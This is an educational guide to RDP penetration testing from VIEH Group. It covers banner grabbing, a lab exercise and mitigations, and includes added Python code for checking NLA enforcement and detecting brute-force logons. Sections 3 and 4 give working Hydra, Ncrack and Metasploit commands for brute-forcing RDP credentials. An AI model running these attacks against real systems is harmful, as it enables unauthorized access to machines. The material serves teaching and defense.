RDP Pentesting Guide 1731850733


A Document series by VIEH Group

RDP Pentesting
A Comprehensive Overview
Disclaimer

Dear readers,
This document is provided by VIEH Group for educational purposes only.
While we strive for accuracy and reliability, we make no warranties or
representations regarding the completeness, accuracy, or usefulness of the
information presented herein. Any reliance you place on this document is at
your own risk. VIEH Group shall not be liable for any damages arising from
the use of or reliance on this document. We acknowledge and appreciate the
contribution of the source person.

Also, this document was not created by a professional content writer, so any mistakes
and errors are part of the great design.

Happy learning!!!

This document is fully credited to Unknown, whose exceptional insights elevate its value.
Their contribution is deeply appreciated, underscoring their significant role in its creation.

Our newsletter: Cyber Arjun

Social Media: @viehgroup viehgroup.com support@viehgroup.com


Research Report: RDP Penetration Testing - A Comprehensive Overview

Table of Contents

1. Introduction to Remote Desktop Protocol
2. Techniques for Banner Grabbing in RDP
   o What is Banner Grabbing?
   o Methods for Banner Grabbing on RDP Services
     - Using `nmap`
     - Using `rdpscan`
     - Using Metasploit
3. Methods for Brute-Force and Password Cracking in RDP
   o Overview of Brute-Force Attacks
   o Common Brute-Force Tools for RDP
     - Hydra
     - Ncrack
     - Metasploit Auxiliary Module
4. Practical Exercise: Penetration Testing on Windows Server VM
   o Banner Grabbing on RDP Server
   o Brute Force Attack on RDP Login
5. Conclusion and Mitigation Recommendations
   o Key Findings
   o Mitigation Strategies
6. References



1. Introduction to Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which
enables users to remotely connect to another computer. It provides the full graphical interface
of the host system, allowing interaction with applications and files just as if the user were
physically present at the machine.

RDP is widely used in IT environments for remote management of systems and remote
troubleshooting. It operates primarily on **TCP port 3389** but can also use **UDP** for
more efficient data transmission in some cases. The protocol supports various features such as
encryption, clipboard sharing, and device redirection. However, its widespread use has also
made it a frequent target for attacks.

COMMON RDP SECURITY RISKS:

o Weak password policies leading to brute-force attacks.
o RDP endpoints exposed to the public internet.
o Vulnerabilities in the protocol, like the infamous BlueKeep (CVE-2019-0708) exploit.
o Lack of multi-factor authentication (MFA).
o Man-in-the-Middle (MitM) attacks when weak encryption methods are used.

2. Techniques for Banner Grabbing in RDP


What is Banner Grabbing?

Banner grabbing is a form of active reconnaissance where an attacker probes a service to
discover critical information such as the software version, service type, and possible
vulnerabilities. In the context of RDP, attackers can use this technique to identify specific
versions of the RDP service and OS type, which can assist in launching targeted attacks.
Methods for Banner Grabbing on RDP Services

1. Using `nmap` for Banner Grabbing

Nmap is a powerful network scanning tool commonly used for service detection and version
identification. Here's how you can perform RDP banner grabbing using `nmap`:

nmap -sV -p 3389 <target-IP>

- -sV: Enables version detection.
- -p 3389: Specifies the RDP port (3389).



Example Output:

3389/tcp open ms-wbt-server Microsoft Terminal Service

This output confirms that the RDP service (Microsoft Terminal Service) is running on the target.

2. Using `rdpscan`:

`rdpscan` is a tool specifically designed for identifying RDP servers. It performs banner
grabbing and determines if the server is vulnerable to specific exploits.

rdpscan <target-IP>

This command gives you more detailed information about the RDP version, encryption
methods, and whether it's susceptible to common RDP vulnerabilities (e.g., BlueKeep).

3. Banner Grabbing with Metasploit:

The Metasploit Framework provides modules for scanning and gathering information on
various services, including RDP:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <target-IP>
run
This Metasploit module checks if the RDP service is accessible and grabs detailed information
such as the protocol version.

Metasploit Example Output:

[+] 192.168.1.100:3389 - RDP Service detected
[+] 192.168.1.100:3389 - Supported Protocols: RDP Security, SSL, CredSSP
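The "Supported Protocols" line above comes from the X.224 Connection Request / Connection Confirm exchange that opens every RDP session (MS-RDPBCGR): the client lists the security layers it accepts in an RDP_NEG_REQ, and the server answers with an RDP_NEG_RSP naming the one it selected, or an RDP_NEG_FAILURE saying why it refused. A defender can use the same exchange to confirm that a server actually enforces Network Level Authentication (CredSSP) instead of merely offering it, which is the NLA mitigation in section 5. The Python below is an added example, not code from the VIEH Group document or from nmap, rdpscan or Metasploit; the constants are the protocol's own, and the three server replies are constructed sample packets (a server that requires CredSSP, a server that accepts a TLS-only downgrade, and a pre-negotiation server) assumed here for illustration.

```python
import struct

# Values from MS-RDPBCGR (RDP_NEG_REQ / RDP_NEG_RSP / RDP_NEG_FAILURE); the sample
# packets at the bottom are constructed for this example, not captured traffic.
PROTOCOL_RDP = 0x00000000        # Standard RDP Security only (no TLS, no NLA)
PROTOCOL_SSL = 0x00000001        # TLS; the user authenticates after the session starts
PROTOCOL_HYBRID = 0x00000002     # CredSSP, i.e. Network Level Authentication
PROTOCOL_RDSTLS = 0x00000004
PROTOCOL_HYBRID_EX = 0x00000008

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}
HYBRID_REQUIRED_BY_SERVER = 0x05


def build_connection_request(requested_protocols):
    """Client side: TPKT header + X.224 Connection Request + RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0x00, 8, requested_protocols)
    # CR code 0xE0, DST-REF, SRC-REF, class option, then the negotiation request
    x224_body = bytes([0xE0, 0x00, 0x00, 0x00, 0x00, 0x00]) + neg_req
    x224 = bytes([len(x224_body)]) + x224_body        # LI = length after itself
    return struct.pack(">BBH", 0x03, 0x00, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Server side: TPKT header + X.224 Connection Confirm, optionally followed by
    RDP_NEG_RSP (server chose a protocol) or RDP_NEG_FAILURE (server refused)."""
    if len(data) < 11 or data[0] != 0x03:
        raise ValueError("not a TPKT frame")
    (tpkt_len,) = struct.unpack(">H", data[2:4])
    if tpkt_len != len(data):
        raise ValueError("TPKT length does not match the data")
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:5 + li]                   # bytes after the 6-byte fixed CC part
    if not neg:
        # Servers predating protocol negotiation answer with a bare CC TPDU:
        # only Standard RDP Security is available.
        return {"kind": "legacy", "selected_protocol": PROTOCOL_RDP, "nla": False}
    if len(neg) < 8:
        raise ValueError("truncated negotiation structure")
    ntype, _flags, nlen, value = struct.unpack("<BBHI", neg[:8])
    if nlen != 8:
        raise ValueError("bad negotiation structure length")
    if ntype == TYPE_RDP_NEG_RSP:
        nla = bool(value & (PROTOCOL_HYBRID | PROTOCOL_HYBRID_EX))
        return {"kind": "response", "selected_protocol": value, "nla": nla}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"kind": "failure", "failure_code": value,
                "failure_name": FAILURE_CODES.get(value, "UNKNOWN"), "nla": False}
    raise ValueError("unknown negotiation type %#x" % ntype)


def server_enforces_nla(confirm_to_request_without_credssp):
    """NLA is enforced only if a request that omitted CredSSP is rejected with
    HYBRID_REQUIRED_BY_SERVER. Any accepted downgrade means NLA is optional."""
    result = parse_connection_confirm(confirm_to_request_without_credssp)
    return result["kind"] == "failure" and result["failure_code"] == HYBRID_REQUIRED_BY_SERVER


# Constructed replies to a request that offered PROTOCOL_RDP | PROTOCOL_SSL only.
SAMPLE_NLA_REQUIRED = bytes.fromhex("03000013" "0ed00000123400" "0300080005000000")
SAMPLE_TLS_ACCEPTED = bytes.fromhex("03000013" "0ed00000123400" "0200080001000000")
SAMPLE_LEGACY_ONLY = bytes.fromhex("0300000b" "06d00000123400")

if __name__ == "__main__":
    print("request offering TLS only:", build_connection_request(PROTOCOL_SSL).hex())
    for name, pkt in [("nla-required", SAMPLE_NLA_REQUIRED),
                      ("tls-accepted", SAMPLE_TLS_ACCEPTED),
                      ("legacy", SAMPLE_LEGACY_ONLY)]:
        print(name, parse_connection_confirm(pkt), "enforces NLA:", server_enforces_nla(pkt))
```

The check in `server_enforces_nla` is deliberately negative: a server counts as enforcing NLA only if it rejects a request that left out CredSSP with HYBRID_REQUIRED_BY_SERVER. An RDP_NEG_RSP that selects TLS, or a bare Connection Confirm from a legacy server, means the logon screen is reachable without NLA, which is exactly the condition the mitigations in section 5 are meant to remove.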



3. Methods for Brute-Force and Password Cracking in RDP
Overview of Brute-Force Attacks

Brute-force attacks on RDP involve systematically guessing login credentials until a valid
username and password combination is found. Because RDP is often exposed to the internet,
attackers frequently attempt to exploit weak or common passwords using this technique. RDP
brute-force attacks can lead to complete system compromise, allowing attackers to gain
unauthorized control over a machine.

Common Brute-Force Tools for RDP

1. HYDRA
Hydra is a widely-used brute-force tool that supports RDP among other protocols. To perform a
brute-force attack on RDP using Hydra, you need a list of potential usernames and passwords.

hydra -L userlist.txt -P passlist.txt rdp://<target-IP>

- -L userlist.txt: The file containing possible usernames.
- -P passlist.txt: The file containing possible passwords.

Example Command:
hydra -L usernames.txt -P passwords.txt rdp://192.168.1.100

Hydra will attempt to log in to the RDP service by trying combinations from the provided
username and password lists.

2. NCRACK:
Ncrack is another robust network authentication cracking tool, optimized for speed. It’s
designed to crack RDP credentials efficiently:

ncrack -p 3389 -U userlist.txt -P passlist.txt <target-IP>

- -p 3389: The RDP port.
- -U userlist.txt: A list of usernames.
- -P passlist.txt: A list of passwords.

Example Command:
ncrack -p 3389 -U users.txt -P passwords.txt 192.168.1.100

3. METASPLOIT AUXILIARY MODULE:

Metasploit provides a dedicated module to brute-force RDP credentials:

use auxiliary/scanner/rdp/rdp_login
set RHOSTS <target-IP>
set USER_FILE userlist.txt
set PASS_FILE passlist.txt
run

This module will iterate through the provided usernames and passwords, attempting to log in
via RDP.

Example Command:
use auxiliary/scanner/rdp/rdp_login
set RHOSTS 192.168.1.100
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Metasploit will report any successful logins.



4. Practical Exercise: Penetration Testing on Windows Server VM (RDP Service)
Exercise Overview

In this practical exercise, we will:

1. Perform banner grabbing on a Windows Server running an RDP service.
2. Execute a brute-force attack on the RDP login interface.

4.1. Banner Grabbing on RDP Server

Target IP Address: Assume the target machine’s IP is `192.168.1.30`.


To check whether the RDP port is up:
nmap 192.168.1.30 -p 3389



1. Banner Grabbing using Nmap:
Run the following command:
nmap -sV -p 3389 192.168.1.30

The output shows that the RDP service is running and identified as "Microsoft Terminal
Service".

2. Metasploit Banner Grabbing:


Use Metasploit to gather more details about the RDP service:
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 192.168.1.30
run



4.2. Brute Force Attack on RDP Login

Hydra Brute Force Attack:

Using Hydra to brute force the RDP login with a sample list of usernames and passwords
(the two commands are the same attack; only the wordlist file names differ):
hydra -L users.txt -P passwords.txt rdp://192.168.1.30
hydra -L user.txt -P password_list.txt rdp://192.168.1.30

5. Conclusion and Mitigation Recommendations

Key Findings
o Banner Grabbing: Successfully identified the RDP service running on the target machine. Tools like Nmap, RDPScan, and Metasploit effectively revealed service details.
o Brute-Force Attack: Tools like Hydra, Ncrack, and Metasploit demonstrated how weak or common credentials could be cracked to gain unauthorized access to the RDP server.

Mitigation Strategies:
o Enable Multi-Factor Authentication (MFA) for RDP logins to make it significantly harder for attackers to compromise accounts.
o Enforce Strong Password Policies: Use complex, unique passwords and enforce regular password changes.
o Restrict RDP Access: Use firewalls to allow RDP access only from trusted IP addresses, or configure a VPN.
o Enable Network Level Authentication (NLA): This adds an extra layer of security by requiring the user to authenticate before establishing an RDP session.
o Monitor RDP Activity: Enable logging and monitor for suspicious login attempts or unusual access patterns.
o Regularly Patch RDP Vulnerabilities: Apply security updates to protect against known RDP exploits such as BlueKeep.
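Every tool in section 3, and the brute-force step of the exercise in section 4, leaves the same footprint on the target: a burst of failed logons (Windows Security event 4625) from one source address, sometimes followed by a success (event 4624). The Python below is an added example, not code from the VIEH Group document, showing the detection logic behind the "Monitor RDP Activity" and "Restrict RDP Access" strategies above: a sliding-window count of failures per source, an alert when a success follows a flagged burst, and an audit of successful RDP logons against a trusted-address allow-list. The log lines are a constructed, simplified export (timestamp, event ID, logon type, source address, user), not a native EVTX dump, and the threshold, window and trusted range are assumed values to be tuned per environment.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Constructed sample input: a simplified whitespace-separated export of Windows
# Security events (timestamp, EventID, LogonType, IpAddress, TargetUserName).
# It is not a native EVTX dump; real 4624/4625 events carry the same fields in
# their EventData. Lines with other event IDs are ignored by the parser.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z 4625 3 203.0.113.7 administrator
2024-05-01T10:00:03Z 4625 3 203.0.113.7 admin
2024-05-01T10:00:05Z 4625 3 203.0.113.7 administrator
2024-05-01T10:00:08Z 4625 3 203.0.113.7 backup
2024-05-01T10:00:11Z 4625 3 203.0.113.7 administrator
2024-05-01T10:00:14Z 4624 10 203.0.113.7 administrator
2024-05-01T10:05:00Z 4625 10 192.168.1.12 jdoe
2024-05-01T10:30:00Z 4625 10 192.168.1.12 jdoe
2024-05-01T10:31:00Z 4624 10 192.168.1.12 jdoe
"""

LINE_RE = re.compile(r"^(\S+)\s+(4624|4625)\s+(\d+)\s+(\S+)\s+(\S+)$")


def parse_events(text):
    """Turn the export into dicts with a timezone-aware timestamp, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append({"time": ts, "event_id": int(m.group(2)),
                       "logon_type": int(m.group(3)), "source": m.group(4),
                       "user": m.group(5)})
    return sorted(events, key=lambda e: e["time"])


def detect_rdp_bruteforce(text, threshold=5, window_seconds=60):
    """Flag a source that produces `threshold` failed logons (4625) inside a sliding
    window, and flag a later remote-interactive success (4624, logon type 10) from a
    flagged source, which is the signature of a guessed password.

    All 4625 events are counted regardless of logon type: with NLA enabled the
    failed attempt is recorded at the CredSSP stage as logon type 3 (network),
    not as type 10, so filtering on type 10 alone would miss the burst."""
    alerts = []
    recent = defaultdict(deque)   # source IP -> failure timestamps inside the window
    flagged = set()
    for ev in parse_events(text):
        src = ev["source"]
        if ev["event_id"] == 4625:
            q = recent[src]
            q.append(ev["time"])
            while (ev["time"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"type": "brute_force", "source": src,
                               "failures": len(q), "at": ev["time"].isoformat()})
        elif ev["event_id"] == 4624 and ev["logon_type"] == 10 and src in flagged:
            alerts.append({"type": "success_after_burst", "source": src,
                           "user": ev["user"], "at": ev["time"].isoformat()})
    return alerts


def logons_outside_allowlist(text, trusted_cidrs):
    """Audit the 'restrict RDP to trusted addresses' control: every successful RDP
    logon (4624, type 10) whose source is outside the trusted ranges is returned."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    hits = []
    for ev in parse_events(text):
        if ev["event_id"] == 4624 and ev["logon_type"] == 10:
            ip = ipaddress.ip_address(ev["source"])
            if not any(ip in net for net in nets):
                hits.append((ev["source"], ev["user"]))
    return hits


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
    print("successful RDP logons from outside the allow-list:",
          logons_outside_allowlist(SAMPLE_EVENTS, ["192.168.1.0/24"]))
```

Thresholds need tuning: five failures in a minute from one address is conservative for an internet-exposed host and would be noisy for a jump box behind a VPN where help-desk password resets are routine. The logon-type note in `detect_rdp_bruteforce` matters in practice: once NLA is enabled, failed attempts no longer appear as logon type 10, so a rule that filters 4625 on type 10 goes blind at precisely the moment the mitigation is applied.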



References

1. [Microsoft RDP Security Best Practices](https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services)
2. [Nmap Official Guide](https://nmap.org/book/man.html)
3. [Hydra Documentation](https://github.com/vanhauser-thc/thc-hydra)



Thanks for checking this out. A lot of love
from VIEH Group

Jai Hind
